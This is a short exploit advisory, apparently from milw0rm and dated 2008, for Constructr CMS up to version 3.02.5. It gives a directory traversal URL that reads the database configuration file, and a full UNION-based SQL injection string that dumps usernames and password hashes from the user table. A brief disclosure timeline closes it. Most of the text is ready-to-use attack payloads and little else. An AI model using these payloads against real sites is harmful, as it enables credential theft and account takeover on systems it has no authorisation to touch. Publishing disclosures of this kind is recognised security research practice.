Constructr CMS http://constructr-cms.org/ - <= 3.02.5 "Stable" - magic_quotes_gpc = Off register_globals = On - Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc - http://site/constructr/backend/template.php?edit_file= Db info: ../config/config.inc.php - SQL - http://site/constructr/?show_page= User (urlencode) : -0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML "Hash" is the password, not really encrypted... - Timeline - Author notified: Dec 12 Public Disclosure: Dec 19 - Seasons Greetings - - http://nukeit.org - # milw0rm.com [2008-12-19]